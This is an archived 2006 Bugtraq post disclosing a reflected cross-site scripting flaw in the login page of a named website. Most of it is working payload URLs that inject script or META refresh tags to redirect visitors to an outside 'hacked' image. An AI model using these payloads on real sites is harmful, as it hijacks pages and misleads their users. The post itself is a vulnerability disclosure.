[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
XSS Vulnerability on www.my6d.com Connection Work System
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: XSS Vulnerability on www.my6d.com Connection Work System
- From: spymeta@xxxxxxxxx
- Date: 25 May 2006 17:44:35 -0000
XSS (Cross Site Scripting) on My6D Connection Work System.
We Can Run JScript & HTML Codes & META Tags etc...
Example :
http://www.my6d.com/Plugins/SixDegreeMain/MainLogin.aspx?error=<script>alert('SPYMETA%20WAS%20HERE%20!')</script>
We Can Direct The Page Our Hacked Index....
Example :
http://www.my6d.com/Plugins/SixDegreeMain/MainLogin.aspx?error=<script>window.location.href="http://members.lycos.co.uk/spymeta/hacked..jpg";</script>
Or We Can Run Direct Meta Tag..
Example :
http://www.my6d.com/Plugins/SixDegreeMain/MainLogin.aspx?error=<META
http-equiv="refresh" content="0;
url=http://members.lycos.co.uk/spymeta/hacked..jpg";>
Powered / Credit : SPYMETA